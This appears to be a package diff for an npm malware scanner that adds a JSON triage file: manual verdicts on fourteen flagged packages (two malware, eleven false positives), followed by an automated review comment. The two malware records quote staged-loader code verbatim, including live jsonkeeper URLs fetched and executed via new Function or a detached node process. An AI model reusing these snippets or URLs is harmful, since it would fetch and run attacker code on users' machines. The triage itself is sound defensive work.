muaddib-scanner 2.11.113 → 2.11.114
@@ -0,0 +1,56 @@
|
|
|
1
|
+
{
|
|
2
|
+
"meta": {
|
|
3
|
+
"period": "2026-06-14",
|
|
4
|
+
"method": "blind code read of archive/ tarballs (not MUAD'DIB labels); verdict on sink reached, not signal shape",
|
|
5
|
+
"context": "Chantier FPR Etape A. Top-band suspects (daily 2026-06-14, score 145-150) + mid-band credential_regex_harvest probes (score 20). See FPR-adjudication-2026-06-14.md + tests/samples/sink-coupling-fp/MANIFEST.md",
|
|
6
|
+
"total_reviewed": 14,
|
|
7
|
+
"tally": { "MALWARE": 2, "UNCERTAIN": 1, "FP": 11 },
|
|
8
|
+
"rubric": "TP = signal coupled to a sink (remote-code exec / exfil to an anomalous host: paste-site, dyn-DNS, raw IP). FP = same signal but local build / first-party host / vendored bundle / no dataflow to sink."
|
|
9
|
+
},
|
|
10
|
+
"results": [
|
|
11
|
+
{ "package": "chalk-pro@7.0.4", "day": "2026-06-14", "score": 150, "verdict": "MALWARE", "review_type": "deep",
|
|
12
|
+
"reasoning": "Masquerade: published as 'chalk' but is nodemailer source + pino deps + added network deps (axios/request/socket.io-client/sqlite3). postinstall 'node lib/utils/index.js' spawns a DETACHED, fully-silenced node process running lib/utils/smtp-connection/index.js, which fetches & execs remote code. Same jsonkeeper C2 as richtext-editor-ui.",
|
|
13
|
+
"payload_quotes": ["spawn(process.execPath,[smtp-connection/index.js],{detached:true,stdio:['ignore','ignore','ignore']}).unref()", "axios.get(\"https://www.jsonkeeper.com/b/TOAAK\").then(r => new Function(\"require\", r.data.cookie)(require))"],
|
|
14
|
+
"fp_trigger_pattern": null, "campaign": "jsonkeeper-staged-loader-2026-06" },
|
|
15
|
+
{ "package": "richtext-editor-ui@1.0.0", "day": "2026-06-14", "score": 150, "verdict": "MALWARE", "review_type": "deep",
|
|
16
|
+
"reasoning": "Name/content mismatch. postinstall.js decodes atob(jsonkeeper URL), axios.get, pipes returned code into a detached node via stdin. Pure remote staged loader. Same actor as chalk-pro.",
|
|
17
|
+
"payload_quotes": ["const s1=(await axios.get(atob('...jsonkeeper.com/b/7EBZP'))).data.content", "spawn('node',[],{detached:true,stdio:['pipe','ignore','ignore']}); child.stdin.write(s1)"],
|
|
18
|
+
"fp_trigger_pattern": null, "campaign": "jsonkeeper-staged-loader-2026-06" },
|
|
19
|
+
{ "package": "xzcbailz@1.0.3", "day": "2026-06-14", "score": 145, "verdict": "UNCERTAIN", "review_type": "deep",
|
|
20
|
+
"reasoning": "Baileys (WhatsApp) fork. preinstall engine-requirements.js is a benign Node-version check. 'newsletter'/'subscribe' hits are all in STOCK Baileys files (messages-recv, chats, jid-utils) -> lifecycle_newsletter_hijack likely misfired on native Baileys newsletter handling. No remote loader / exfil found. Would need a diff vs upstream Baileys to confirm an injected auto-follow.",
|
|
21
|
+
"payload_quotes": [], "fp_trigger_pattern": "baileys_fork_newsletter_misfire" },
|
|
22
|
+
{ "package": "@kinoshitastudio/noa@0.1.0", "day": "2026-06-14", "score": 150, "verdict": "FP", "review_type": "deep",
|
|
23
|
+
"reasoning": "Self-hosted LOCAL web terminal (express+ws+node-pty), token-gated, path-traversal guarded. direct_ip_exfil = a hardcoded Tailscale IP in a console.log start banner, NOT an egress sink. lifecycle_hidden_payload = postinstall node-pty native rebuild.",
|
|
24
|
+
"payload_quotes": ["const tailscaleIP='100.107.218.60'; console.log(`Tailscale -> http://${tailscaleIP}:${PORT}`)"], "fp_trigger_pattern": "local_web_terminal" },
|
|
25
|
+
{ "package": "@lordofdestiny/mynumber@1.5.2", "day": "2026-06-14", "score": 150, "verdict": "FP", "review_type": "deep",
|
|
26
|
+
"reasoning": "C++ native addon (binding.gyp, CMakeLists, src/*.cpp, @mapbox/node-pre-gyp). install.js = node-pre-gyp prebuilt-fetch-or-build (LOCAL toolchain). No exfil/credential sink.",
|
|
27
|
+
"payload_quotes": [], "fp_trigger_pattern": "native_addon_node_pre_gyp" },
|
|
28
|
+
{ "package": "mandrel@1.64.0", "day": "2026-06-14", "score": 145, "verdict": "FP", "review_type": "deep",
|
|
29
|
+
"reasoning": "Code-quality / AI-agents CLI. 44x dynamic_import = lib/cli command lazy-loading. postinstall best-effort 'mandrel sync' (documented no-net/no-shell, exits 0). No sink.",
|
|
30
|
+
"payload_quotes": [], "fp_trigger_pattern": "cli_dynamic_import_loader" },
|
|
31
|
+
{ "package": "vibes-prompt-runner@0.1.0-beta.2", "day": "2026-06-14", "score": 150, "verdict": "FP", "review_type": "deep",
|
|
32
|
+
"reasoning": "WebdriverIO + VS Code extension test harness. postinstall patch-wdio.js patches its OWN node_modules (wdio-vscode-service, VS Code main.js) + local codesign. No remote fetch / exfil.",
|
|
33
|
+
"payload_quotes": [], "fp_trigger_pattern": "wdio_vscode_test_harness" },
|
|
34
|
+
{ "package": "xp-gate@0.5.1", "day": "2026-06-14", "score": 150, "verdict": "FP", "review_type": "deep",
|
|
35
|
+
"reasoning": "Code-quality gate CLI with git hooks (husky-style) + multi-language adapters + AI skills. 0 runtime deps. git_hooks_injection = installs pre-commit/pre-push hooks. prepack build script. No network/credential/exfil. (scoped @boyingliu01/xp-gate is the same tool.)",
|
|
36
|
+
"payload_quotes": [], "fp_trigger_pattern": "git_hook_dev_tool" },
|
|
37
|
+
{ "package": "opticore-asymmetric-cryption@1.0.0", "day": "2026-06-14", "score": 147, "verdict": "FP", "review_type": "deep",
|
|
38
|
+
"reasoning": "RSA crypto helper from a coherent vendor family (opticore-*, author guyzoum77). postinstall.mjs = cosmetic cfonts/chalk banner + 'run npx opticore-gen-keys' hint, with isDev/isCI guard. typosquat_lifecycle/dependency_typosquat_require = boundary-squat compound misfire on the family deps. No sink.",
|
|
39
|
+
"payload_quotes": ["cfonts.say('OpticoreJS',...); console.log('Run: npx opticore-gen-keys')"], "fp_trigger_pattern": "typosquat_compound_misfire" },
|
|
40
|
+
{ "package": "react-markup@0.0.0-experimental", "day": "2026-06-14", "score": 20, "verdict": "FP", "review_type": "deep",
|
|
41
|
+
"reasoning": "Official React package (experimental channel), 0 deps, 0 scripts. cjs/*.development.js bundles. credential_regex_harvest + dangerous_call_eval + intent_credential_exfil all fire on the minified-ish React bundle. No sink.",
|
|
42
|
+
"payload_quotes": [], "fp_trigger_pattern": "vendor_bundle_minified" },
|
|
43
|
+
{ "package": "@floless/app@0.18.1", "day": "2026-06-14", "score": 20, "verdict": "FP", "review_type": "deep",
|
|
44
|
+
"reasoning": "Local AI-app launcher (SEA build, skills, web UI). 0 deps, NO install hook. detached/silent_stealth/lifecycle_dangerous_exec = launching its OWN local server (launch.mjs). No remote exfil.",
|
|
45
|
+
"payload_quotes": [], "fp_trigger_pattern": "local_app_launcher" },
|
|
46
|
+
{ "package": "@remotion/whisper-web@4.0.477", "day": "2026-06-14", "score": 20, "verdict": "FP", "review_type": "deep",
|
|
47
|
+
"reasoning": "Whisper speech-to-text WASM for Remotion. remote_code_load = downloads the GGML model from huggingface.co/ggerganov/whisper.cpp (first-party ML host). No exfil.",
|
|
48
|
+
"payload_quotes": ["https://huggingface.co/ggerganov/whisper.cpp/resolve/main/ggml-"], "fp_trigger_pattern": "ml_model_download" },
|
|
49
|
+
{ "package": "@vxrn/react-native-prebuilt@1.17.11", "day": "2026-06-14", "score": 20, "verdict": "FP", "review_type": "deep",
|
|
50
|
+
"reasoning": "Vendored React + React-Native renderers (ReactFabric-dev.js etc.) for the vxrn/One bundler. staged_payload/proxy_data_intercept/builtin_override_exfil fire on the vendored RN reconciler. 0 fetch/ws, no install hook.",
|
|
51
|
+
"payload_quotes": [], "fp_trigger_pattern": "vendored_framework_internals" },
|
|
52
|
+
{ "package": "@kilocode/cli-darwin-x64@7.3.44", "day": "2026-06-14", "score": 20, "verdict": "FP", "review_type": "deep",
|
|
53
|
+
"reasoning": "AI coding CLI (174MB: prebuilt darwin binary + Shiki language-grammar web console assets). websocket_c2/remote_code_load/staged_binary_payload fire on the prebuilt binary + the LLM-provider catalog (opencode.ai, zenmux.ai, perplexity, cloudflare...). Not C2.",
|
|
54
|
+
"payload_quotes": [], "fp_trigger_pattern": "ai_cli_binary_catalog" }
|
|
55
|
+
]
|
|
56
|
+
}
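Review bot: The `verdict` vocabulary on the `results` records (`MALWARE`/`UNCERTAIN`/`FP`, also used in `meta.tally`) does not match the rubric text in `meta.rubric`, which defines `TP`/`FP`, so a consumer correlating records with the rubric has to guess that `MALWARE` means `TP`; either align the terms or state the mapping in the rubric, e.g. `"rubric": "MALWARE (TP) = signal coupled to a sink ..."`. The records are also inconsistent about absent values: the two MALWARE entries carry `"fp_trigger_pattern": null` while every FP entry omits `campaign` instead of setting it to `null`, so any strict schema for this file would have to admit both policies. Since `meta.context` points at `tests/samples/sink-coupling-fp/MANIFEST.md` and the file ships inside the scanner package, the un-defanged live loader URLs in the two MALWARE `payload_quotes` may be followed by automated link checkers or matched by the scanner's own remote-code detectors if it ever inspects its own tarball; storing them defanged (`jsonkeeper[.]com`) or recording in `meta.method` that quotes are verbatim IoCs would avoid that, though whether such a self-scan happens is not visible here.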